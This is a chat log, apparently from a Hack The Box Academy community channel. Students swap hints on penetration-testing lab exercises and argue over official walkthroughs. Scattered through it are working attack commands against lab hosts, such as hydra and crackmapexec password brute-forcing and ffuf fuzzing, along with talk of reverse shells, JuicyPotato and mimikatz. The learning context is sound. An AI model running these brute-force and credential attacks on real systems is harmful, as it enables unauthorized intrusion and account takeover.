For academy

What?

A pdf isnt doable due to their infra?

How do you propose it being accessible after doing a skill assessment is the point

Even a video on YouTube xD

There is plenty of way with minimal web dev

I'm not saying they can't do a file or video. But currently, how it's set up, it's not feasible on a large scale

Then dm a staff if you believe the solution to be that simple

Im curious on how it is not feasible to verify all good answer was answered on the skill assesment page ^^

@west canopy

The point being the way that it's set up, they would have to add additional code to then have the download be available

And if you got the answer, it shouldn't matter if it's one of the ways it can be done

We pay for the module, it isnt like they sell a service

Of course it matters lol in AD for example it matters

Anyway, it isnt like we have the choice lmao

i haven't found it yet

Hi, I'm stuck on Nmap (Network Enumeration) firewall, IDS/IPS hard exercise, was able to find the X port, but can't seem to get the version. any pointers?

hello guys i have a question about this module

https://academy.hackthebox.com/module/77/section/847

when i do the connection the banner that i recive is different of the real answer, i am doing something wrong or the right answer for the module is wrong ?

||```

• the answer that i do when i connect with nc says XXXXX Debian-5+deb11u1
• the answer expected to be submited is XXXXX Ubuntu-4ubuntu0.1

I dont remember if it is this question so take it carefully but iirc you must look with netcat like written somewhere in the module 😉

Tried nc with source port 53 as well but it keeps timing out

Password attacks, Pass the ticket from linux. On the svc_workstation question, I got the flag.txt which seems to have 'Archive' attribute. How do I read it?, I google around and say, I shoud be able to use 'vi flag.txt' to see the inside for the flag. Which I did, but HTB says is wrong. I tried changing the extension to zip and tar but didn't work. If I do a 'cat flag', I get two unreadeable characters added to the flag. So what I am missing here?. Also, another question here, did you were able to get the password for svc_workstation? because with aes-256, I decided not to even tried cracking the password.

you can use smbclient normally and just get the flag file

yes, I did a 'get flag.txt' on the smbclient to download the file. However, I get a couple of extra bytes for the flag.

looks right to me maybe you want to read the task again (especially the part in the brackets)

ok.. I think there is some kind of data stream hidden with in the file, [::$DATA], but I am not sure how to look at that. I tried google 'stream data' and 'data stream' but I am not getting the write info. Is this the right path?

dm me

https://github.com/RyanDodd21/GaTS/tree/main

PrivEsc and Enumiration script/tool downloader for windows + linux

thanks a lott

Hey people. I am doing the sqlmap module on the academy (note have finished the sql injection module). Just going through the first exercises. Is quite simple with the tool at hand hehe. My question is can i do the same result e.g. find the flag by including manual sql injections from POST request in Burp? Tyring to put the results given by sqlmap in the request and while i recieve info i dont see the info i want.

Hello everyone! I am stuck in the skill assessment I of the AD module. I am trying to connect to MS01 machine, but I cant. The ping is received but I dont have a request with the Enter-PSSession command. Can anyone give my a hint? thanks so much

What dot does you mean?

The dot in the message

He is correct, the dot is important.

or if you prefer, the period.

Does anyone know why ftps directories are empty when you login and do ls but if you use wget -m --no-passive ftp://name:password@ip:port it downloads files?

I'm working on the file upload attacks module I've used msfvenom to set up my reverse shell I can use a web shell to see command output and I see the shell uploaded but when I try to visit the url [IP:PORT]/uploads/reverse.php to activate it I get /*

do you have read access?

Yes using the same user

sure, sqlmap just uses different payloads to identify a entrypoint, you can do the same manually. Now you may have to manually adjust the actual sql that is being executed, but that shouldn't be so hard once you know how to inject the sql in the given exercise

Im on the hard assessment in the password attacks module and I got the administrator hash but no matter how i use it seems like its wrong. Can someone help me out?

I can't understand what message do you mean. I have the following messages in the server responses. Either "Log in failed with the given credentials." or "500 Internal Server Error" or "<b>Error</b>: Missing xxx parameter". Also "A password reset token was sent to your email address". Can you hint more ?

I don't think you need the admin hash

I mounted the drive and unlocked it on my linux machine and after connecting the SAM and System I got the administartor hash. I don't really know what else to look for

Exercise link?

https://academy.hackthebox.com/module/147/section/1356

once you crack the ||bitlocker|| hash you can just grab it from the vdi right?

sorry is this relevant? I mean can I do something with this?

hello all

AD Enumeration & Attacks - Skills Assessment Part II

one of the questions is solved by password spraying

i cracked that hash and then mounted the vdi file and inside the vdi file i found the hashes

please givve me tips on how to know what password to spray

Isn't the flag in the backup?

appreciate any help 🙂

The question says : flag.txt in C:\Users\Administrator\Desktop\ and I dont see any flag.txt files in the backup so idk

Try the absolute most common, stupid things it could be. Hint: ||The password is explicitly mentioned in one of the sections as one you can spray||

I must have something messed up in my notes then, I'll take a look at it when I get back to my computer

tried Welcome1 and it is not working

thanks bro that would be amazing

maybe you just haven't enumerated users properly

everything needed to do this is covered in the module

this is the format of my user list "username@inlanefreight.local"

and am doing it via kerbrute

were you able to get through this?

i'm in the footprint hard lab, i got the ssh private key through openssl s_client -connect IP:pop3s but when i try to connect ssh, this error apear Load key "id_rsa": error in libcrypto tom@10.129.57.90: Permission denied (publickey).

can anyone help me?¢

Is there a proper app I can edit the .Java files from attacking thick applications in? I get a ton of errors when I try to do it with notepad

And I think it’s because of this shit

It doesn’t work when I try to edit the invoker.Java for downloading the fatty-server.jar, nor does it work with editing the user.java for the sql injection part

Help would be greatly appreciated

Hello I am at the second question of Unconstrained Delegation - Computers. I've done everything as shown in the course, I've also bruteforced the admin hash but I can't get to the Share. I also tried renewing the tickets and restarting the machines. Can you explain where I went wrong?

You dont need to complete it to complete the room

can anyone help me with the hard lab of the footprint module?

What exactly is not working?

those are properly formated block comments and shouldnt be an issue. when I did this part (which I hated wholeheartedly) it helped me a lot to just skip it and go on with the module and come back in the morning

It doesn’t matter if I remove it?

Or not add it when I input code snippets from the module

neither they are just comments added by the disassembler

Alright, thanks

oo..this splunk module is a morale killer haha..rough for sure

Have you had a chance to take a look

Compiling the user.java still seems to give me errors

Role seems to be the issue, idk what’s wrong with it though

look up ippsec's video on Fatty

the entire section is a straight rip from part of that box

oh damn..i just noticed you got your CPTS madfox...grats dude...i took a break to do some blue team stuff...back at it now

@thorn urchin with ligolo using responder if I use the tun0 interface it intercepts the ligolo interface as well?

I dont know

I think it doesnt

but I havnt tested thoroughly enough

k

Probably not considering LLMNR poisoning wouldn't work over a VPN. The only way I could see responder working over ligolo is setting up something like socat to redirect traffic, but at that point it's really no different than how you would try to do it on something like proxychains

There's a reason tools like Inveigh exist, so you can just run your listener from within the subnet instead of doing weird networking gymnastics

Thank you, saved me from a night of pain

ligolo agents do have some redirection magics, but I havnt experimented with them much beyond figuring out how to double+ pivot with em properly

but the redirection isn't really part of the tuntap setup afaik, pretty sure it's just additional stuff baked into the agent

yow mates

I'm stuck at bash scriptin

I dunno, ligolo does some weird stuff most similar tools dont do and the docs only cover the bare basic usage. It def warrants some experimentation

I do know programming but I think I made a dumb error and I can't find it

https://github.com/nicocha30/ligolo-ng/blob/ee150f6934d7ee0b19cbe2697153c457860cfb10/cmd/agent/main.go#L117

Source code is actually very interesting (and makes me want to try and rewrite in Rust) but it looks like, outside of the "gvisor userland network stack" magic, the redirection things is just basic network i/o

only skimmed code for like 5 mins though

can someone tell me what's wrong there:
http://10.129.149.43:8080/

sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 10.129.149.43 -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=<form name='login'"
neither does this work:
sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 10.129.149.43 -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

root:password is correct, but hydra doesn't detect it

Im on Attacking Active Directory & NTDS.dit . I must "submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive) " Bruteforcing rn with this command: crackmapexec smb 10.129.202.85 -u JMarston -p /home/legomyego/Downloads/rockyou.txt | grep -v "N_FAILURE"

Should I use a different password list?

I'd be more patient, but I keep having to reset the target machine due to connection issues

ATTACKING ENTERPRISE NETWORKS | Port Forwarding Issue

I have used sshuttle and ligolo-ng successfully in Dante and also Zephyr. But for this environment, nothing beyond the jump box of 10.129.x.x can reach back to my attack machine. I can evil-winrm to 172.16.x.x devices only because of sshuttle, but setting up ligolo after that doesn't seem to be working. Anyone have any insight into this or experienced similar?

sometimes egress is simply filtered this way

gotta route back to the jump host to reach your machine

yea I've been using that as a staging for tools, but trying to ssh to the inner domain from my attack box is a no go because of this

ssh is a forward connection, shouldnt matter

unless youre doing some reverse ssh port forwarding stuff

can anyone throw me a hint on the Splunk Module, first lesson/last question "which account had the most 4624's within a 10minute time span"

nah nothing like that

then sounds like you have a different issue

if you have a successful tunnel in, then ssh will work

nvm I got it

Hi guys, I'm on Windows Fundamentals module and I'm having problems with the "smbclient" command in bash, it outputs me the next error:

do_connect: Connection to (target IP) failed (Error NT_STATUS_IO_TIMEOUT)

Which is pretty weird since I used xfreerdp with the same target IP and it connects perfectly, I even configured the SMB permissions in the target, the module tells me this is the output that should print on the screen:

GreyWolf7@htb[/htb]$ smbclient -L IPaddressOfTarget -U htb-student
Enter WORKGROUP\htb-student's password:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
Company Data    Disk      
IPC$            IPC       Remote IPC

smbclient -L lists the fileshares then disconnects

Are you putting 'Company Data' in quotes when connecting?

I don't see anywhere that ask me to type the directory

This is the command: "smbclient -L IPaddressOfTarget -U htb-student"

And it is weird for me that the module shows me the "-L" parameter that is supossed for Listing and then puts an placeholder for an ip

The syntax should be on the page
smbclient //ip/'sharename' -U username

The -L just stands for LIST

When you do -L it does not matter anything else you do, it will list available shares, then immediately disconnect

any chance someone could help me out with the HARD footprinting lab ? I have got the ssh connection under tom, but I am having issues trying to escalate priveleges

Can anyone help me?

did you crack it?

Check history

I tried with hashcat and using mutated password list and it said cracked but where it’s supposed to say the password it’s just blank so it’s like hash:blank

refresh my memory, was this an ntlm hash by any chance?

Yes u get the sam database from the backup and it has a administrator ntlm hash

gotcha, then that means you tried cracking the wrong hash

format is generally Admin:RID:hash:hash:stuff

you want the second hash

There is a file named "my_credentials.txt" in the desktop of the workstation (pwnbox), do I use the credentials stated by that file for the command or do I use the usual "htb-student" username and "Academy_WinFun!" password? (sorry for not attaching any image, I would if I could)

ive never opened up that file in my life

use the explicitly provided credentials when they say to use em

anyone knows how solve this problem? Load key "id_rsa": error in libcrypto
tom@IP: Permission denied (publickey).

is in the footprint hard lab

did you set the permissions for id_rsa

yeah

chmod 600

Those credentials are for you to remote into

I just did it again on the second hash and it came out the same: (hash):blank
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM

DM the full output

Any one try to use eyewitness software recently? Is used in early sections of the Attacking common applications module. Fresh install of the most latest version I cannot get that software to run at all as far as taking screenshots seems like its broken. May just not like my computer though. Seeing if anyone else had issues if you happen to use it.

👍

i copy the ssh private key here

anyone help me? i'm stuck with this module for 3 hours

sure dm me

They have nothing to do with any module credentials, they are your personal credentials if you were to remote into/or file transfer to the machine

Maybe the format, you can fix with vim %s/\\n/\r/g

Then you can try this ssh connections ssh - i id_rsa tom@10.10.10.10

Does it give a reason?

Also encase the password in single quotes

hello guys, whom can I send a DM regarding Password Attacks module | Credential Hunting in Linux section

cuz, asking directly from here maybe I can be spoiling...

You can dm me.

Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))

can someone give me the answer to this lol

i been stuck on it for months and just wanna move on and get a cube to be honest

You're free to move on, without answering the question. If you've spent months on that one, moving on would not be advised.

i have moved on

but i wanna get a cube

and finish the path properly

Is this from footprint module?

yeh

Link your section

DNS'

Dm me, we will figure it out together

its ok. i havent got time rn to be honest. thanks for the offer though. i'll be back soon

Sorry for the wait, but the admin pass should be in your mutated list, just checked it

What happened is when I dumped the hashes from the two files it gave me the wrong hash I redumped the hashes and this time got a different hash I was able to crack

Ah, glad you where able to get it, module complete 🎉

Is ssh even open?

So are you running ssh from the remote machine?

Hello friends

I'm confused, My target is 94.237.49.11:38623. My task is to grab the banner, so I do netcat 94.237.49.11 22
output is SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1 but answer is SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1 what am i doing wrong

you were provided a specific ip and port

nvm i figured it out

instead you grabbed the banner of a different port on the host

needed to scan provided prot

port

ty tho

Take another close look at the txt file you found on the way here. Which service runs on port 80 and which service runs on port 443?

And then you just delete your posts? Okay, you can do that.
But then, unfortunately, it doesn't help any other students.

More likely a mod lol

They didn't seem like they where spoiling anything?

the hardest part of the footprinting module was the easy skill assessment because I kept misspelling the user's name

Mood

genuinely spent about 30-60 mins thinking the username was ciel instead of ceil

Honestly mood

Also fun fact; you're doing the nerfed version of the easy lab

Previously you had to either: use hint, or bruteforce

ew

footprinting

I'm basically doing the CPTS path in reverse

I've been solving boxes and CTF-ing for a few years now, I'm mostly doing stuff to find holes in my knowledge

so I did Active Directory, Windows Privilege Escalation, and Pivoting first because I knew I wasn't as good as I should be with those

good luck o7

my hint is that bob likes to use weak passwords. I still can't get it

Hello everyone, on the Windows Privilege Escalation Skills Assessment - Part I, when trying privesc with juicy, I receive a "[+] CreateProcessWithTokenW OK" but no reverse shell. I have brute force all clsid but still not working. Can someone help me pls ?

Have you found the solution yet?

does anybody know if its possible to reset a modules progress in academy?

i think is impossible

meh 😦 but thx 🙂

Hello everyone, im in ACTIVE DIRECTORY ENUMERATION & ATTACKS in privileged access module im trying to execute this query in bloodhound MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2 but this return me NO DATA RETURNED FROM THE QUERY, what im doing wrong?

Did you manage to get the answer? I've been stuck on that one for a while

INFORMATION GATHERING - WEB EDITION --> Active Subdomain Enumeration -->Submit the number of all "A" records from all zones as the answer.

Anyone that can give me a hint?

Find all zones and count all A Records. I can't give much more hints than that.

Little change in text but clear now. Thanks 🙂

Did you write entries in the log file so that the file is rotated?

There are also log files that do not concern the web server 😉

I am having trouble with question 3 of this module(https://academy.hackthebox.com/module/22/section/342) and not sure what to look for:
"Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group. "

$protectedUsersGroupName = 'Protected Users'

Find the account with an SPN set and is a member of the Protected Users group

$account = Get-ADUser -Filter "ServicePrincipalName -like '*'" -Properties SamAccountName, ServicePrincipalName |
Where-Object { $.ServicePrincipalName -ne $null -and
(Get-ADGroupMember -Identity $protectedUsersGroupName -Recursive |
Where-Object { $.SamAccountName -eq $_.SamAccountName }) }"

Hey guys.. what's up

quick question pls

how do i clear bloodhound so to feed new data to it

Oh! just found it ..

Please if someone could help me with the windows privesc assement 1🙂

To simplify the query, since you are looking for a "group" you can use the Get-ADGroupMember

Hello everyone

I've asked others but so far nobody has been able to get it without brute forcing

Yea, same here. Got it but don't agree it is the correct one. Was hoping that someone understands why. Anyway, thanks! 🙂

Same thing for me, although I spent an hour trying to figure out how that was the correct answer and still had nothing

iirc you nmap and when you find the port of the service you use nc to connect to that port to find the version. I made it a long time ago

Do I need to use grep command if i need to identify fqdn of the host where the last octet ends with x.x.x.203? Im on footprinting > dns module. Im stuck to this last question.
Im currently brute forcing it to find subdomains

Im still on Attacking Kerberos Module on the part of RBCD from windows, for some reason when I use the included PowerView.ps1 script that comes with the machine, Im unable to perform the exploit

But when I use another version downloaded from my kali, I can do it

so you have try to run your shell with all clsid that work? (which is about ||69||)

hint if you are brute forcing the subdomain of the main domain then that's the wrong path

You need to brute force the host of a subdomain

Yes and many seems to work as they return ok statement and that it is running as SYSTEM but no shell recieved

Guy's, I'm looking for a job opportunity in Cybersecurity related roles can anyone refer me?🙂

Thank you. I got the correct syntax command and answered the last question 🎉

Thanks guys got the correct answer and completed the dns module

yo - https://academy.hackthebox.com/module/51/section/480 I chose to make it more challenging and found a foothold on how to get a shell, but whenever I try to login to the webpage, I'm loging in and then I'm logout after 5 sec or so, is that normal behaviour? I eventually get shell as www-data but my session keep disconnecting. Same if I decide to use the ssh credentials provided, i keep getting disconnected from my session.. So is the machine bugging out on me or this is intenional ? Reseting the machine doesn't seems to help.

if you have both the pwnbox and your vpn on at the same time then that could be the issue no this isn't intended

Thanks for reply, i did have pwn box and vpn, but i terminated pwnbox.. i guess i need to wait a bit.

pls, can i get a quick help on ATTACKING ENTERPRISE NETWORKS ==> Lateral Movement

can't tell why mimikatz prints ERROR

I don't think that PowerShell console is open as Administrator.

i'm trying to escalate to Administrator.. so i only added my current user to the Administrator group

can't open the powershell as Administrator

A sign out and sign in should reflect the changes and allow you to open it as Administrator irc

Can you try that?

how ?

i'm on remote session

yeah got it

Oh! yeah.. that worked so find

thanks bro

cmd /c
STDOUT:

C:\inetpub\wwwroot\status.inlanefreight.local\files\demo.aspx
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\4308d536\e65a892\demo.aspx.8a26be37.compiled
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946\demo.aspx.e75de2f5.compiled

Error
Incorrect answer! ?

q :Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)

mod:SHELLS & PAYLOADS

cont:Laudanum, One Webshell to Rule Them All

https://www.hackthebox.com/hacker/infosec-careers

Did you find the path?

🙂

Someone know how to spawn a reverse shell as administrator if I am in the administrators group?

I only have access to winrm

You can assemble a Reverse Shell here.
https://www.revshells.com/

The reverse shell will run with the rights from the user

I have a dumb question on the first footprint lab: is it supposed to be blind or did I just do it wrong?

hello everyone, for those who made the Password Attack Module/Credential Hunting in Linux, how could you ran the crypto tool?

cuz, the tool need Python3.9 to work properly but the version running in the machine is 3.8

Did you ||brute force ftp||?

no - "letter" said no aggressive behaviour because "production"

Oh dam, well that's what I did lmao

Hi, would anyone be free to answer a short question on subdomain Enum ?

@cinder cobalt shoot to see if can I help....

Greetings, is there anyone who uses a laptop with a portable monitor? I'd love to hear your feedback and advice.

"[...] it is forbidden to attack the services aggressively using exploits, as these services are in production."

The flavor text is just meant to say no CVEs, as those would all be unintended solutions

Brute forcing is on the table still

A lot of the Windows boxes in Academy are still vulnerable to PrintNightmare and other exploits, so it makes sense

wait, they also give you credentials for that one

yeah there's zero brute forcing on that one

Hi, would anyone be free to answer a short question on subdomain Enum ? (turns out p4 is unavailable rn)

just having an issue with the subdomain enum part of "information gathering" web edition

yoo im stuck again on Attacking Common Services: Skill Assessment - Hard.

I'm fairly sure I'm right at the end. I just have an issue finding the right syntax.

What exactly is not working?

You can write me a DM with the command, then I can probably help you.

alright.

ffuf -w /home/kali/ids.txt:FUZZ -u http://admin.academy.htb:47612/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: applications/x-www-form-urlencoded' -fs 798 why isn't this command working?

the port is right

and the ip is already in /etc/hosts

thats a vhost so you need to add the host flag

I am having a bit of difficult wrapping my head around the*** stack alignment*** for ***printf ***function to work in assembly ... I would appreciate if someone could explain this to me. Thanks in advance

Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key? i am stuck here

what module, what section

JAVASCRIPT DEOBFUSCATION page 10 (skill assessment )

-H 'Host: host.com' ?

yes

anyone who has made Password Attack Module/Credential Hunting in Linux....

can send DM?

sure

gime some minutes

give me...

No stress.
You can also ask the question here.
I just wanted to show you with the badge how many people have completed the module to answer your question.

solved i have to refresh the given ip to get the -X post result

I don't want to spoiler

idk if i can write this here but i invited a friend to the htb , he completed the module of the introduction but i still didnt receive any cubes

Support doesn't monitor here - you have to use the help on the site.

What do you guys think it's more worth the cubes? Network enumeration with nmap or Shells & Payloads

Ok., Houston I'm stuck, how suppose can run decrypt tool Password Attack Module/Credential Hunting in Linux.... IF python3.9 & python2 are not installed in the victim machine?

Depends on what you feel more or less comfortable with. Tbh I'd go for a different module altogether because I think those two are just okay, but it's really up to your needs at the end of the day.

yeah i was thinking about that , i think the shells & payloads will be more useful , since it's 2 days and the network information is easly founded on internet

We do not make writeups or official solution guides publicly available for Academy because 1) they could end up being distributed 2) we prefer having a community based support system.

If you're completely new, and you have to choose between the two, probably do the nmap module.

Whaat up @west canopy

However, I think my favorite modules have been the privilege escalation ones, active directory enumeration and attacks, pivoting, and the attacking enterprise networks ones

im not completely new , i know how to work with nmap , the only thing that caught my attention in the nmap module is the Firewall and IDS/IPS Envasion

mainly because those were areas I was weakest in and needed to do some refining, but I also think the lab offerings in those modules are probably some of the best on the platform for how much they cost

There are some really good ones and others sometimes fall flat it feels

IDS IPS Evasion might just be using NULL/FIN/XMAS scan

lab offerings are more useful imo, sadly in my country it's laggy w 300 ping 💀

yes it's a double edged sword. Writeups definitely have their place, and we don't want students to be stuck forever on a single problem. But I think at least on the Academy side, there are quite a few avenues for students to find support.

some academy content itself you can just google or learn elsewhere for free

password attacks was tough but not due to content, it was waiting for the machine to crack the hashes.

i think my weakest area between the shells and nmap , i think it's shells beacause web shells are still a little harder sometimes

The leak problem is definitely pretty big, but if there was some way I could see an intended route for the more involved skill assessments like active directory enum and attacks, broken authentication, or even shells and payloads, that would be nice. Not as a way to walk you through the solution, but as a way to potentially see a different way of doing it.

I guess the community aspect covers most of that though

@trail leaf I am sure there are those of us that would not mind comparing notes.

yeah, I was mostly just thinking out loud

When I was playing through the CBBH/CPTS modules i tried to document how I solved every problem . And then I would talk to other students and see how they solved it, if it was a different way I would document it and add it to my notes

Cool but doesnt work well

And that's a user problem, the guy bought the module for nothing and will failed his exams... When the missing walkthrough is a problem for the others students who want to verify if he really understood the way he must solves the assesment

In most of the cases exercises are solely based on what you've been taught in the section

Of course, there is the note to not expect everything to be put on the platter for you to copy and paste

True, I find reading the module is like a write-up for most of the labs lol

You are studying for a pen tester role, and for a type writer

At the same time, you can respawn and repeat skill assessments

Yeah and i will bother others students instead of having an official walkthrough for something i paid for. The support from community have his limit

Building the thought process is crucial

yep you get access to the labs forever. Also i STILL am discovering new things even in some of our older labs

And what it will male you think you must will not take the same shortcut etc

If it works...

You are paying for material, not for a writeup

If you have a shortcut then that means you understand it a bit more than what's taught

also --- not that I am trying to upsell you on anything --- if you purchase the Academy Silver Annual plan , you can get 1 on 1 lab guidance from HTB staff

And i paid for a support not for a free student support. That's stupid anyway

that's not how buying things works

You can use the support

I.e. for months the (old) footprinting - easy lab people didn't know how to get the credentials, and had to use the hint. I eventually figured it out. I assume the change was due to not being taught certain tools on the module

But asking here isn't like you're truly bothering anyone, unless you're spamming or pinging random people

If you have paid for support, e.g. you have silver annual check how you can utilize it - https://academy.hackthebox.com/news/7-dec-2022

https://www.hackthebox.com/blog/discord-lab-tutoring

For the silver annual WE havent all 300-400€ to put on it. But it isnt about a help to solve a lab. Let's take the AD enumeration and attacks module, the skill assesment II, there is some Bad shortcut to solve it and the shortcut make people miss all what the module try to teach you

Then message support

And inform them

OMG i give up with you lmao

If it's an actual issue

Like if it's a shortcut that can be worked around to remove it, the lab will be changed

You cant removed it lmao

That's just the unfortunate nature of AD

¯_(ツ)_/¯

How you will removed it

lol finest blue chat

Yeah that's why a walkthrough is needed for the AD at least

lol i am still second guessing myself over the change I made on that one btw 😉

Or, you can do both. The shortcut. And the "intended" way using what's taught

But how the guy know it is a shortcut xD

If the guy took the module he doesnt know that

good change, but wow ciel (ceil?) is a stupid username 😆

I know that because i make AD pentest htb make it mandatory to pass the cert

It's a good change tbh. It allows the bigger focus on footprinting rather than a brick wall for Google or the hint

let ceil alone!

I honestly didn't get it until after pass attacks and realizing, "there's a tool for that"™️

whats the point of a walk through for a skill assessment???

lol well also that ceil username wasn't even in the provided wordlist on that lab. So for students not using the hint, they would need to just spray wordlists and cross their fingers

You gunna go to client, get stuck, and ask em for a walkthrough on hacking their systems?

If you know a more efficient way, then you know it more

Maybe read what i wrote first... When completed you have access to a walkthrough to confirm you completed the intended way and not byvtaking shortcut

Not even: the banner on the alt port gives it away

oh true I forgot it did that

So the hints are there like a client answer? Hmm logic

okay I'm gonna need to investigate this LOL

The hints are nudges in the right direction, usually referring to it as "a colleague" or it's general knowledge

Did I say that?

I dont believe I did

so now that we have someone who actually knows: is ceils ftp supposed to be blind?

hey people for Password Attack Module/Credential Hunting in Linux did you use laZagne or firefox_decrypt?

Did i said we will ask client for a walkthrough ? I dont think... Still a logic...

it makes no sense having a walkthrough for the skill assessments

what do you mean by blind

What is seemed you were asking for very much is equivalent to that.

Being said I only walked into the convo seeing you cry about not having walkthroughs. I did not see the original part where you said provide walkthroughs for after module completion.

So I do apologize for that misunderstanding.

It has no sense to ask answer for skill assesment but you did

having no listing

you are definitely able to list files

It still feels unnecessary however. Labs with unintended paths are extremely rare.

interesting when I did it I always got an empty listing

I will try to reproduce it - Im stuck on hard now anyways 😄

Ohh, that's what you mean, did you try ||ls -al||?

ls -al isnt a supported ftp command right?

Works for me, just tried it right now

oops

I dont cry lmao im not even concerned by it like the AD module, i do AD pentest daily but for a learning experience and after talking to the teens i have in the local "hacker" association, they have doubt they really solves it like they must did so they are still unsure about their knowledge

maybe I should become a street sweeper instead

I got stuck on the hidden folders too lol

Yes. You need to use it on the target

It is

Have them go through it again and see if they can solve it without their first method

Honestly its the first Ive even heard of the AD module having an unintended path for the skill assessments

yep I know but, my concern is how to use it if the python version is not compatible with the tools?

It should be fine to use python2.7? I don't recall having issues

I dont remember it was incompatible python version

python2.7 is not installed in the victim machine

well the victim machine is running python3.8 and the firefox tool needs python3.9

Is that the error you're getting?

yep

Try downloading an older version

And transferring

I did already and python2 is not installed in the victim machine

Can you not download a python3.8 version?

I was trying to use Bank retired machine from the 9 free boxes that were supposed to be free for a month. but I couldn't access today

That's not a solution honestly, some of them are already limited by time etc we do a review in the group but it is easier to have a walkthrough when completed. The leak problem isnt really one, what avoid to share mine for example, we even saw a the bug bounty path leaked entirely.

#1128623304199110796 or #boxes or contact support

Theres already leaks isnt really a good argument.

And that sucks about them not having time. This course isnt meant for a teacher to use as their curriculum for a class, its for self paced self study.

If the answers and everything for cbbh are leaked report the site to support

python3.8 is the current version running in the system but, firefox_decrypt need python3.9 to run properly

I think you misunderstood, nobody use it as a curriculum for their class, they are teens in college, they have 10-14years old...

@west canopy https://github.com/unode/firefox_decrypt

Okay and?

Its excellent theyre trying to learn things at a young age!

They have a passion and we are here to animate it and guide them

Okay cool

I just asked for nudge or sanity check when I had tried all and I didn't really know what more to do. And I hadn't seen you told to be able to see the walkthrough after complete it.

As of 1.0.0 it requires 3.9

but how is that relevant to the course?

So you cant Ask them thé dedication an adult or older put in this passion

Then you do it and create a writeup for them if it's really that important

¯_(ツ)_/¯

Honestly yeah

Yeah again you ask students to make things people paid for

Gives practice for the exam in the process

Like the support here

You pay for the module, not support

he means u can create the write up

I don't understand getting so upset at wanting the entire structure of the course to be changed to accommodate just your group on one module you have a complaint about

to share it with ur students

You joke right ?

No

No

only one paid tier gets support

well akshually with silver annual, you pay for suppurt

Support here is entirely voluntary

🤓

You have a Real problem with understanding

and that doesnt mean you get walkthroughs, it means a staff member helps you out

They aren't paying for it

this is like free support lol

this is a community channel for community help on Academy please stay on topic

Im working with your broken english here, please try to be cognizant of the english barrier here as I have been trying to give your words the benefit of the doubt.

Yeah free support from a company who sell courses and just have millions in invsetors lmao

If you think I misunderstood, try explaining again.

support from htb is only on the website through the support chat/tickets

discord is for the community

there is the silver annual support

He cannot use this as support?

which does redirect to getting help from staff on discord

but thats it

no entitlement to walkthroughs

guided mode is for retired boxes i believe

I always used that when I had any problem with the platform

oh you mean the support chat?

Is it a problem with the platform?

he is talking about that no?

No, I just had to talk with them 2 times.

Every people try to take the convo without even knowing what the convo was about lmao

@tall saffron End of the day is that staff have seen your request about adding walkthroughs at end of modules. Most of us here disagree with that. Thats that.

once because I couldn't turn off a machine some months ago and they solved it in 10 minutes

And youre getting way too hostile about it to other people

• you want a walk through that's available after you complete the skill assessment
• its a moot point

Lmao

The whole point with academy is to teach you methodologies and develop your problem solving skills, there are labs you can practice whatever you want

People are allowed to disagree with your opinion and suggestion.

and the other one for the coupon of the season 1

lemme try

So before i cry now im hostile xD

If you have solved it in another way, good for you.

I read the first line "as of 1.0.0 python 3.9 is required

Yes

The following mathematical problem 2+2=4 can be solved in many different ways, but does that mean they are wrong?

Cool

Youre getting way too upset at people not agreeing with you.

Its not even a bad suggestion, I just dont agree with it.

4 = 4
2 = 2
0 = 0

No you have this in mind when written talk arent good for emotive people like you

but doing a write-up for you students of the skill assessment takes you 30 minutes

^

Im sorry I don't understand what you wrote there, can you rephrase it?

If you didnt understood read it again 😉

Your english is barely passable and the sentence was completely broken. Im offering you the chance to clarify.

I downloaded the version shared by you, zipped/uploaded/unzipped ran it, and this is the exact error that I'm having :

kira@nix01:~/firefox_decrypt$ ./firefox_decrypt.py 
Traceback (most recent call last):
  File "./firefox_decrypt.py", line 46, in <module>
    PWStore = list[dict[str, str]]
TypeError: 'type' object is not subscriptable
kira@nix01:~/firefox_decrypt$ ```

I downloaded the version shared by you, zipped/uploaded/unzipped ran it,

Weird i never received complaints and talk english with people daily so Ask questions about yourself

Well Im actually a native speaker and had an English major so...

ok take it to DMs before I mute you both

What version of the tool is it?

I'm trying to work with ya here and youre being an ass about it

He is so emotive that he needs to talk about my english

This may be a case of needing to use pwnbox as that probably has the older version compatible

Since the subject was debated... Have a good day/night free workers

emotive emotional

We aren't employed by htb lol.

Good night

That's the whole point of it

let me try

and good luck on your CPTS journey 👍

It will not be a problem with all the previous cert 😉

But the discord is just a community to help each other

the workers are in the main platform

Awesome! Wish ya well.

@west canopy @autumn pilot hey things may be broken if people are installing newer versions of Firefox decrypt as it now requires python >=3.9, and the old version they link requires python 2.x, which isn't installed on target. Pass ATTACK- credential hunting in Linux. Can you verify? (Firefox decrypt version >=1.0.0

thanks @fathom pendant

I cant reach the target machine in https://academy.hackthebox.com/module/112/section/1066 (FTP). Tried both the pwnbox and my own VM/VPN

Restart the Lab and try again

any tips on the hard nmap-lab?

Hi can't undestand why in windows privesc assessment 1 I get juicypotato working on the target but no reverse shell... Could someon help please ?
I get the good message on the target :
